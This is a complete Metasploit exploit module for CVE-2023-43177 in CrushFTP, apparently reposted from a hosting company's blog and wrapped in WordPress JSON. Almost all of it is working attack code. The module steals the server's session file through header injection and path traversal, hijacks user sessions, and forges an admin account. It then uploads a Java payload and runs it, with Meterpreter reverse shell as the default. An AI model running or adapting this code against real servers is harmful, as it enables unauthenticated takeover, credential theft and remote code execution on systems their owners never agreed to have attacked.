##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking<\/p>\n
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::Java::HTTP::ClassLoader
prepend Msf::Exploit::Remote::AutoCheck<\/p>\n
class CrushFtpError < StandardError; end
class CrushFtpNoAccessError < CrushFtpError; end
class CrushFtpNotFoundError < CrushFtpError; end
class CrushFtpUnknown < CrushFtpError; end<\/p>\n
def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘CrushFTP Unauthenticated RCE’,
‘Description’ => %q{
This exploit module leverages an Improperly Controlled Modification
of Dynamically-Determined Object Attributes vulnerability
(CVE-2023-43177) to achieve unauthenticated remote code execution.
This affects CrushFTP versions prior to 10.5.1.<\/p>\n
It is possible to set some user’s session properties by sending an HTTP
request with specially crafted Header key-value pairs. This enables an
unauthenticated attacker to access files anywhere on the server file
system and steal the session cookies of valid authenticated users. The
attack consists in hijacking a user’s session and escalates privileges
to obtain full control of the target. Remote code execution is obtained
by abusing the dynamic SQL driver loading and configuration testing
feature.
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘Ryan Emmons’, # Initial research, discovery and PoC
‘Christophe De La Fuente’ # Metasploit module
],
‘References’ => [
[ ‘URL’, ‘https:\/\/convergetp.com\/2023\/11\/16\/crushftp-zero-day-cve-2023-43177-discovered\/’],
[ ‘URL’, ‘https:\/\/github.com\/the-emmons\/CVE-2023-43177\/blob\/main\/CVE-2023-43177.py’],
[ ‘URL’, ‘https:\/\/www.crushftp.com\/crush10wiki\/Wiki.jsp?page=Update’],
[ ‘CVE’, ‘2023-43177’],
[ ‘CWE’, ‘913’ ]],
‘Platform’ => %w[java unix linux win],
‘Privileged’ => true,
‘Arch’ => [ARCH_JAVA, ARCH_X64, ARCH_X86],
‘Targets’ => [
[
‘Java’,
{
‘Arch’ => ARCH_JAVA,
‘Platform’ => ‘java’,
# If not set here, Framework will pick this payload anyway and set the default LHOST to the local interface.
# If we set the payload manually to a bind payload (e.g. `java\/meterpreter\/bind_tcp`) the default LHOST will be
# used and the payload will fail if the target is not local (most likely).
# To avoid this, the default payload is set here, which prevent Framework to set a default LHOST.
‘DefaultOptions’ => { ‘PAYLOAD’ => ‘java\/meterpreter\/reverse_tcp’ }
}
],
[
‘Linux Dropper’,
{
‘Arch’ => [ ARCH_X64, ARCH_X86 ],
‘Platform’ => ‘linux’
}
],
[
‘Windows Dropper’,
{
‘Arch’ => [ ARCH_X64, ARCH_X86 ],
‘Platform’ => ‘win’
}
],
],
‘DisclosureDate’ => ‘2023-08-08’,
‘DefaultTarget’ => 0,
‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘Reliability’ => [REPEATABLE_SESSION],
‘SideEffects’ => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]}
)
)
register_options(
[
Opt::RPORT(8080),
OptString.new(‘TARGETURI’, [true, ‘The base path of the CrushFTP web interface’, ‘\/’]),
OptInt.new(‘SESSION_FILE_DELAY’, [true, ‘The delay in seconds between attempts to download the session file’, 30])
])
end<\/p>\n
def send_as2_query_api(headers = {})
rand_username = rand_text_hex(10)
opts = {
‘uri’ => normalize_uri(target_uri.path, ‘WebInterface\/function\/?command=getUsername’),
‘method’ => ‘POST’,
‘headers’ => {
‘as2-to’ => rand_text_hex(8),
# Each key-value pair will be added into the current session\u2019s
# `user_info` Properties, which is used by CrushFTP to store information
# about a user’s session. Here, we set a few properties needed for the
# exploit to work.
‘user_ip’ => ‘127.0.0.1’,
‘dont_log’ => ‘true’,
# The `user_name` property will be be included in the response to a
# `getUsername` API query. This will be used to make sure the operation
# worked and the other key-value pairs were added to the session’s
# `user_info` Properties.
‘user_name’ => rand_username
}.merge(headers)
}<\/p>\n
# This only works with anonymous sessions, so `#get_anon_session` should be
# called before to make sure the cookie_jar is set with an anonymous
# session cookie.
res = send_request_cgi(opts)
raise CrushFtpNoAccessError, ‘[send_as2_query_api] Could not connect to the web server – no response’ if res.nil?<\/p>\n
xml_response = res.get_xml_document
if xml_response.xpath(‘\/\/loginResult\/response’).text != ‘success’
raise CrushFtpUnknown, ‘[send_as2_query_api] The API returned a non-successful response’
end<\/p>\n
# Checking the forged username returned in the response
unless xml_response.xpath(‘\/\/loginResult\/username’).text == rand_username
raise CrushFtpUnknown, ‘[send_as2_query_api] username not found in response, the exploit didn\\’t work’
end<\/p>\n
res
end<\/p>\n
def send_query_api(command:, cookie: nil, vars: {}, multipart: false, timeout: 20)
opts = {
‘uri’ => normalize_uri(target_uri.path, ‘WebInterface\/function\/’),
‘method’ => ‘POST’
}
if multipart
opts[‘vars_form_data’] = [
{
‘name’ => ‘command’,
‘data’ => command
},
]unless cookie.blank?
opts[‘vars_form_data’] << {
‘name’ => ‘c2f’,
‘data’ => cookie.last(4)
}
end
opts[‘vars_form_data’] += vars unless vars.empty?
else
opts[‘vars_post’] = {
‘command’ => command
}.merge(vars)
opts[‘vars_post’][‘c2f’] = cookie.last(4) unless cookie.blank?
end
opts[‘cookie’] = “CrushAuth=#{cookie}; currentAuth=#{cookie.last(4)}” unless cookie.nil?<\/p>\n
res = send_request_cgi(opts, timeout)
raise CrushFtpNoAccessError, ‘[send_query_api] Could not connect to the web server – no response’ if res.nil?<\/p>\n
res
end<\/p>\n
def get_anon_session
vprint_status(‘Getting a new anonymous session’)
cookie_jar.clear
res = send_request_cgi(
‘uri’ => normalize_uri(target_uri.path, ‘WebInterface’),
‘method’ => ‘GET’,
‘keep_cookies’ => true
)
raise CrushFtpNoAccessError, ‘[get_anon_session] Could not connect to the web server – no response’ if res.nil?<\/p>\n
match = res.get_cookies.match(\/CrushAuth=(?<cookie>\\d{13}_[A-Za-z0-9]{30})\/)
raise CrushFtpNotFoundError, ‘[get_anon_session] Could not get the `currentAuth` cookie’ unless match<\/p>\n
vprint_status(“Anonymous session cookie: #{match[:cookie]}”)
match[:cookie]end<\/p>\n
def check
vprint_status(‘Checking CrushFTP Server’)
res = send_request_cgi(
‘uri’ => normalize_uri(target_uri.path, ‘WebInterface’, ‘login.html’),
‘method’ => ‘GET’
)
return CheckCode::Unknown(‘Could not connect to the web server – no response’) if res.nil?
return CheckCode::Safe(‘The web server is not running CrushFTP’) unless res.body =~ \/crushftp\/i<\/p>\n
cookie = get_anon_session<\/p>\n
vprint_status(‘Checking if the attack primitive works’)
# This will raise an exception in case of error
send_as2_query_api<\/p>\n
do_logout(cookie)<\/p>\n
CheckCode::Appears
rescue CrushFtpError => e
CheckCode::Unknown(“#{e.class} – #{e.message}”)
end<\/p>\n
def rand_dir
@rand_dir ||= “WebInterface\/Resources\/libs\/jq-3.6.0_#{rand_text_hex(10)}-js\/”
end<\/p>\n
def get_session_file
# Setting this here to be reachable by the ensure block
cookie = nil
begin
cookie = get_anon_session
rescue CrushFtpError => e
print_bad(“[get_session_file] Unable to get an anonymous session: #{e.class} – #{e.message}”)
return nil
end<\/p>\n
vprint_status(“Getting session file at `#{rand_dir}`”)
headers = {
‘filename’ => ‘\/’,
‘user_protocol_proxy’ => rand_text_hex(8),
‘user_log_file’ => ‘sessions.obj’,
‘user_log_path’ => ‘.\/’,
‘user_log_path_custom’ => File.join(‘.’, rand_dir)
}
send_as2_query_api(headers)
formatted_dir = File.join(‘.’, rand_dir.delete_suffix(‘\/’))
register_dirs_for_cleanup(formatted_dir) unless @dropped_dirs.include?(formatted_dir)<\/p>\n
res = send_request_cgi(
‘uri’ => normalize_uri(target_uri.path, rand_dir, ‘sessions.obj’),
‘method’ => ‘GET’
)
unless res&.code == 200
print_bad(‘[get_session_file] Could not connect to the web server – no response’) if res.nil?
print_bad(‘[get_session_file] Could not steal the session file’)
return nil
end
print_good(‘Session file downloaded’)<\/p>\n
tmp_hash = Rex::Text.md5(res.body)
if @session_file_hash == tmp_hash
vprint_status(‘Session file has not changed yet, skipping’)
return nil
end
@session_file_hash = tmp_hash<\/p>\n
res.body
rescue CrushFtpError => e
print_bad(“[get_session_file] Unknown failure:#{e.class} – #{e.message}”)
return nil
ensure
do_logout(cookie) if cookie
end<\/p>\n
def check_sessions(session_file)
valid_sessions = []session_cookies = session_file.scan(\/\\d{13}_[A-Za-z0-9]{30}\/).uniq
vprint_status(“Found #{session_cookies.size} session cookies in the session file”)
session_cookies.each do |cookie|
res = send_query_api(command: ‘getUsername’, cookie: cookie)
username = res.get_xml_document.xpath(‘\/\/loginResult\/username’).text
if username == ‘anonymous’
vprint_status(“Cookie `#{cookie}` is an anonymous session”)
elsif username.empty?
vprint_status(“Cookie `#{cookie}` is not valid”)
else
vprint_status(“Cookie `#{cookie}` is valid session (username: #{username})”)
valid_sessions << { cookie: cookie, username: username }
end
rescue CrushFtpError => e
print_bad(“[check_sessions] Error while checking cookie `#{cookie}`: #{e.class} – #{e.message}”)
end
valid_sessions
end<\/p>\n
def check_admin_and_windows(cookie)
res = send_query_api(command: ‘getDashboardItems’, cookie: cookie)<\/p>\n
is_windows = res.get_xml_document.xpath(‘\/\/result\/response_data\/result_value\/machine_is_windows’).text
return nil if is_windows.blank?
return true if is_windows == ‘true’<\/p>\n
false
rescue CrushFtpError
vprint_status(“[check_admin_and_get_os_family] Cookie #{cookie} doesn’t have access to the `getDashboardItems` API, it is not an admin session”)
nil
end<\/p>\n
def get_writable_dir(path, cookie)
res = send_query_api(command: ‘getXMLListing’, cookie: cookie, vars: { ‘path’ => path, ‘random’ => “0.#{rand_text_numeric(17)}” })
xml_doc = res.get_xml_document
current_path = xml_doc.xpath(‘\/\/listingInfo\/path’).text
if xml_doc.xpath(‘\/\/listingInfo\/privs’).text.include?(‘(write)’)
return current_path
end<\/p>\n
res.get_xml_document.xpath(‘\/\/listingInfo\/listing\/listing_subitem’).each do |subitem|
if subitem.at(‘type’).text == ‘DIR’
dir = get_writable_dir(File.join(current_path, subitem.at(‘href_path’).text), cookie)
return dir unless dir.nil?
end
end<\/p>\n
nil
rescue CrushFtpError => e
print_bad(“[get_writable_dir] Unknown failure: #{e.class} – #{e.message}”)
nil
end<\/p>\n
def upload_file(file_path, file_content, id, cookie)
file_size = file_content.size
vars = [
{ ‘name’ => ‘upload_path’, ‘data’ => file_path },
{ ‘name’ => ‘upload_size’, ‘data’ => file_size },
{ ‘name’ => ‘upload_id’, ‘data’ => id },
{ ‘name’ => ‘start_resume_loc’, ‘data’ => ‘0’ }
]res = send_query_api(command: ‘openFile’, cookie: cookie, vars: vars, multipart: true)
response_msg = res.get_xml_document.xpath(‘\/\/commandResult\/response’).text
if response_msg != id
raise CrushFtpUnknown, “Unable to upload #{file_path}: #{response_msg}”
end<\/p>\n
form_data = Rex::MIME::Message.new
form_data.add_part(file_content, ‘application\/octet-stream’, ‘binary’, “form-data; name=\\”CFCD\\”; filename=\\”#{file_path}\\””)
post_data = form_data.to_s
post_data.sub!(“Content-Transfer-Encoding: binary\\r\\n”, ”)<\/p>\n
send_request_cgi(
‘uri’ => normalize_uri(target_uri.path, ‘U’, “#{id}~1~#{file_size}”),
‘method’ => ‘POST’,
‘cookie’ => “CrushAuth=#{cookie}; currentAuth=#{cookie.last(4)}”,
‘ctype’ => “multipart\/form-data; boundary=#{form_data.bound}”,
‘data’ => post_data
)<\/p>\n
vars = [
{ ‘name’ => ‘upload_id’, ‘data’ => id },
{ ‘name’ => ‘total_chunks’, ‘data’ => ‘1’ },
{ ‘name’ => ‘total_bytes’, ‘data’ => file_size },
{ ‘name’ => ‘filePath’, ‘data’ => file_path },
{ ‘name’ => ‘lastModified’, ‘data’ => DateTime.now.strftime(‘%Q’) },
{ ‘name’ => ‘start_resume_loc’, ‘data’ => ‘0’ }
]send_query_api(command: ‘closeFile’, cookie: cookie, vars: vars, multipart: true)
end<\/p>\n
def check_egg(session_file, egg)
path = session_file.match(%r{FILE:\/\/.*?#{egg}})
return nil unless path<\/p>\n
path = path[0]vprint_status(“Found the egg at #{path} in the session file”)
if (match = path.match(%r{^FILE:\/\/(?<path>[A-Z]:.*)#{egg}}))
print_good(“Found path `#{match[:path]}` and it is Windows”)
elsif (match = path.match(%r{^FILE:\/(?<path>.*)#{egg}}))
print_good(“Found path `#{match[:path]}` and it is Unix-like”)
end
match[:path]end<\/p>\n
def move_user_xml(admin_username, writable_dir)
headers = {
‘filename’ => ‘\/’,
‘user_protocol_proxy’ => rand_text_hex(8),
‘user_log_file’ => ‘user.XML’,
‘user_log_path’ => “.\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..#{writable_dir}”,
‘user_log_path_custom’ => “.\/users\/MainUsers\/#{admin_username}\/”
}
send_as2_query_api(headers)
end<\/p>\n
def do_priv_esc_and_check_windows(session)
vprint_status(‘Looking for a directory with write permissions’)
writable_dir = get_writable_dir(‘\/’, session[:cookie])
if writable_dir.nil?
print_bad(‘[do_priv_esc_and_check_windows] The user has no upload permissions, privilege escalation is not possible’)
return nil
end
print_good(“Found a writable directory: #{writable_dir}”)<\/p>\n
egg_rand = rand_text_hex(10)
print_status(“Uploading the egg file `#{egg_rand}`”)
egg_path = File.join(writable_dir, egg_rand)
begin
upload_file(egg_path, rand_text_hex(3..6), egg_rand, session[:cookie])
rescue CrushFtpError => e
print_bad(“[do_priv_esc_and_check_windows] Unable to upload the egg file: #{e.class} – #{e.message}”)
return nil
end<\/p>\n
admin_password = rand_text_hex(10)
user_xml = <<~XML.gsub!(\/\\n *\/, ”)
<?xml version=’1.0′ encoding=’UTF-8′?>
<user type=’properties’>
<username>#{session[:username]}<\/username>
<password>MD5:#{Rex::Text.md5(admin_password)}<\/password>
<extra_vfs type=’vector’><\/extra_vfs>
<version>1.0<\/version>
<userVersion>6<\/userVersion>
<created_by_username>crushadmin<\/created_by_username>
<created_by_email><\/created_by_email>
<created_time>#{DateTime.now.strftime(‘%Q’)}<\/created_time>
<filePublicEncryptionKey><\/filePublicEncryptionKey>
<fileDecryptionKey><\/fileDecryptionKey>
<max_logins>0<\/max_logins>
<root_dir>\/<\/root_dir>
<site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)<\/site>
<password_history><\/password_history>
<\/user>
XML
xml_path = File.join(writable_dir, ‘user.XML’)
print_status(“Uploading `user.XML` to #{xml_path}”)
begin
upload_file(xml_path, user_xml, rand_text_hex(10), session[:cookie])
rescue CrushFtpError => e
print_bad(“[do_priv_esc_and_check_windows] Unable to upload `user.XML`: #{e.class} – #{e.message}”)
return nil
end<\/p>\n
path = nil
loop do
print_status(‘Looking for the egg in the session file’)
session_file = get_session_file
if session_file
path = check_egg(session_file, egg_rand)
break if path
end
print_status(“Egg not found, wait #{datastore[‘SESSION_FILE_DELAY’]} seconds and try again… (Ctrl-C to exit)”)
sleep datastore[‘SESSION_FILE_DELAY’]end
print_good(“Found the file system path: #{path}”)
register_files_for_cleanup(File.join(path, egg_rand))<\/p>\n
cookie = nil
begin
cookie = get_anon_session
rescue CrushFtpError => e
print_bad(“[do_priv_esc_and_check_windows] Unable to get an anonymous session: #{e.class} – #{e.message}”)
return nil
end
admin_username = rand_text_hex(10)
vprint_status(“The forged user will be `#{admin_username}`”)
vprint_status(“Moving user.XML from #{path} to `#{admin_username}` home folder and elevate privileges”)
is_windows = path.match(\/^[A-Z]:(?<path>.*)\/)
move_user_xml(admin_username, is_windows ? Regexp.last_match(:path) : path)<\/p>\n
do_logout(cookie)
# `cookie` is explicitly set to `nil` here to make sure the ensure block
# won’t log it out again if the next call to `do_login` raises an
# exception. Without this line, if `do_login` raises an exception, `cookie`
# will still contain the value of the previous session cookie, which should
# have been logged out at this point. The ensure block will try to logout
# the same session again.
cookie = nil<\/p>\n
print_status(‘Logging into the elevated account’)
cookie = do_login(admin_username, admin_password)
fail_with(Failure::NoAccess, ‘Unable to login with the elevated account’) unless cookie<\/p>\n
print_good(‘Logged in! Now let\\’s create a temporary admin account’)
[create_admin_account(cookie, is_windows), is_windows]ensure
do_logout(cookie) if cookie
end<\/p>\n
def create_admin_account(cookie, is_windows)
# This creates an administrator account with the required VFS setting for the exploit to work
admin_username = rand_text_hex(10)
admin_password = rand_text_hex(10)
user_xml = <<~XML.gsub!(\/\\n *\/, ”)
<?xml version=’1.0′ encoding=’UTF-8′?>
<user type=’properties’>
<username>#{admin_username}<\/username>
<password>#{admin_password}<\/password>
<extra_vfs type=’vector’><\/extra_vfs>
<version>1.0<\/version>
<userVersion>6<\/userVersion>
<created_by_username>crushadmin<\/created_by_username>
<created_by_email><\/created_by_email>
<created_time>#{DateTime.now.strftime(‘%Q’)}<\/created_time>
<filePublicEncryptionKey><\/filePublicEncryptionKey>
<fileDecryptionKey><\/fileDecryptionKey>
<max_logins>0<\/max_logins>
<root_dir>\/<\/root_dir>
<site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)<\/site>
<password_history><\/password_history>
<\/user>
XML<\/p>\n
url = is_windows ? ‘FILE:\/\/C:\/Users\/Public\/’ : ‘FILE:\/\/var\/tmp\/’<\/p>\n
vfs_xml = <<~XML.gsub!(\/\\n *\/, ”)
<?xml version=’1.0′ encoding=’UTF-8′?>
<vfs_items type=’vector’>
<vfs_items_subitem type=’properties’>
<name>tmp<\/name>
<path>\/<\/path>
<vfs_item type=’vector’>
<vfs_item_subitem type=’properties’>
<type>DIR<\/type>
<url>#{url}<\/url>
<\/vfs_item_subitem>
<\/vfs_item>
<\/vfs_items_subitem>
<\/vfs_items>
XML<\/p>\n
perms_xml = <<~XML.gsub!(\/\\n *\/, ”)
<?xml version=’1.0′ encoding=’UTF-8′?>
<VFS type=’properties’>
<item name=’\/’>
(read)(view)(resume)
<\/item>
<item name=’\/TMP\/’>
(read)(write)(view)(delete)(deletedir)(makedir)(rename)(resume)(share)(slideshow)
<\/item>
<\/VFS>
XML<\/p>\n
vars_post = {
‘data_action’ => ‘new’,
‘serverGroup’ => ‘MainUsers’,
‘username’ => admin_username,
‘user’ => user_xml,
‘xmlItem’ => ‘user’,
‘vfs_items’ => vfs_xml,
‘permissions’ => perms_xml
}<\/p>\n
res = send_query_api(command: ‘setUserItem’, cookie: cookie, vars: vars_post)
return nil if res.body.include?(‘Access Denied’) || res.code == 404<\/p>\n
{ username: admin_username, password: admin_password }
rescue CrushFtpError => e
print_bad(“[create_admin_account] Unknown failure: #{e.class} – #{e.message}”)
nil
end<\/p>\n
def do_login(username, password)
vprint_status(“[do_login] Logging in with username `#{username}` and password `#{password}`”)
vars = {
‘username’ => username,
‘password’ => password,
‘encoded’ => ‘true’,
‘language’ => ‘en’,
‘random’ => “0.#{rand_text_numeric(17)}”
}
res = send_query_api(command: ‘login’, cookie: ”, vars: vars)
unless res.code == 200 && res.get_xml_document.xpath(‘\/\/loginResult\/response’).text.include?(‘success’)
print_bad(‘[do_login] Login failed’)
return nil
end<\/p>\n
match = res.get_cookies.match(\/CrushAuth=(?<cookie>\\d{13}_[A-Za-z0-9]{30})\/)
unless match
print_bad(‘[do_login] Cannot find session cookie in response’)
return nil
end<\/p>\n
match[:cookie]end<\/p>\n
def do_logout(cookie)
vprint_status(“Logging out session cookie `#{cookie}`”)
vars = {
‘random’ => “0.#{rand_text_numeric(17)}”
}
res = send_query_api(command: ‘logout’, cookie: cookie, vars: vars)
unless res.code == 200 && res.get_xml_document.xpath(‘\/\/commandResult\/response’).text.include?(‘Logged out’)
vprint_bad(‘[do_logout] Unable to logout’)
end
rescue CrushFtpError => e
vprint_bad(“[do_logout] An error occured when trying to logout: #{e.class} – #{e.message}”)
end<\/p>\n
def do_rce(cookie, is_windows)
jar_file = payload.encoded_jar({ arch: payload.arch.first })
jar_file.add_file(“#{class_name}.class”, constructor_class)
jar_filename = “#{rand_text_hex(4)}.jar”
jar_path = is_windows ? “C:\/Users\/Public\/#{jar_filename}” : “\/var\/tmp\/#{jar_filename}”<\/p>\n
print_status(“Uploading payload .jar file `#{jar_filename}` to #{jar_path}”)
begin
upload_file(jar_filename, jar_file.pack, class_name, cookie)
rescue CrushFtpError => e
raise CrushFtpUnknown, “[do_rce] Unable to upload the payload .jar file: #{e.class} – #{e.message}”
end<\/p>\n
print_status(‘Triggering the payload’)
vars = {
‘db_driver_file’ => jar_path,
‘db_driver’ => class_name,
‘db_url’ => ‘jdbc:derby:.\/hax;create=true’,
‘db_user’ => rand_text(3..5),
‘db_pass’ => rand_text(10..15)
}
begin
send_query_api(command: ‘testDB’, cookie: cookie, vars: vars, timeout: 0)
rescue CrushFtpNoAccessError
# Expecting no response
end<\/p>\n
register_files_for_cleanup(jar_path)
end<\/p>\n
def delete_user(username, cookie)
vars = {
‘data_action’ => ‘delete’,
‘serverGroup’ => ‘MainUsers’,
‘usernames’ => username,
‘user’ => ‘<?xml version=”1.0″ encoding=”UTF-8″?>’,
‘xmlItem’ => ‘user’,
‘vfs_items’ => ‘<?xml version=”1.0″ encoding=”UTF-8″?><vfs type=”vector”><\/vfs>’,
‘permissions’ => ‘<?xml version=”1.0″ encoding=”UTF-8″?><permissions type=”vector”><\/permissions>’
}
send_query_api(command: ‘setUserItem’, cookie: cookie, vars: vars)
end<\/p>\n
def exploit
admin_creds = nil
is_windows = nil
loop do
print_status(‘Downloading the session file’)
session_file = get_session_file
unless session_file
print_status(“No session file, wait #{datastore[‘SESSION_FILE_DELAY’]} seconds and try again… (Ctrl-C to exit)”)
sleep datastore[‘SESSION_FILE_DELAY’]next
end<\/p>\n
print_status(‘Looking for the valid sessions’)
session_list = check_sessions(session_file)
if session_list.empty?
print_status(“No valid sessions found, wait #{datastore[‘SESSION_FILE_DELAY’]} seconds and try again… (Ctrl-C to exit)”)
sleep datastore[‘SESSION_FILE_DELAY’]next
end<\/p>\n
# First, check if we have active admin sessions to go ahead and directly go the RCE part.
session_list.each do |session|
print_status(“Checking if user #{session[:username]} is an admin (cookie: #{session[:cookie]})”)
# This will return nil if it is not an admin session
is_windows = check_admin_and_windows(session[:cookie])
next if is_windows.nil?<\/p>\n
print_good(‘It is an admin! Let\\’s create a temporary admin account’)
admin_creds = create_admin_account(session[:cookie], is_windows)
break
end<\/p>\n
# If the previous step failed, try to escalate privileges with the remaining active sessions, if any.
if admin_creds.nil?
print_status(‘Could not find any admin session or the admin account creation failed’)
session_list.each do |session|
print_status(“Attempting privilege escalation with session cookie #{session}”)
admin_creds, is_windows = do_priv_esc_and_check_windows(session)
break unless admin_creds.nil?
end
end<\/p>\n
break unless admin_creds.nil?<\/p>\n
print_status(
“Creation of an admin account failed with the current active sessions, wait #{datastore[‘SESSION_FILE_DELAY’]}”\\
‘seconds and try again… (Ctrl-C to exit)’
)
sleep datastore[‘SESSION_FILE_DELAY’]end<\/p>\n
print_good(“Administrator account created: username=#{admin_creds[:username]}, password=#{admin_creds[:password]}”)<\/p>\n
cookie = do_login(admin_creds[:username], admin_creds[:password])
fail_with(Failure::NoAccess, ‘Unable to login with the new administrator credentials’) unless cookie<\/p>\n
do_rce(cookie, is_windows)<\/p>\n
print_status(‘Cleanup the temporary admin account’)
delete_user(admin_creds[:username], cookie)
rescue CrushFtpError => e
fail_with(Failure::Unknown, “Unknown failure: #{e.class} – #{e.message}”)
ensure
do_logout(cookie) if cookie
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRanking include Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::FileDropperinclude Msf::Exploit::Remote::Java::HTTP::ClassLoaderprepend Msf::Exploit::Remote::AutoCheck class CrushFtpError < StandardError; endclass CrushFtpNoAccessError < CrushFtpError; endclass CrushFtpNotFoundError < CrushFtpError; endclass CrushFtpUnknown < CrushFtpError; end def initialize(info = {})super(update_info(info,‘Name’ => ‘CrushFTP Unauthenticated RCE’,‘Description’ => %q{This exploit module leverages an Improperly Controlled Modificationof Dynamically-Determined …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56260","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56260","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56260"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56260\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56260"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}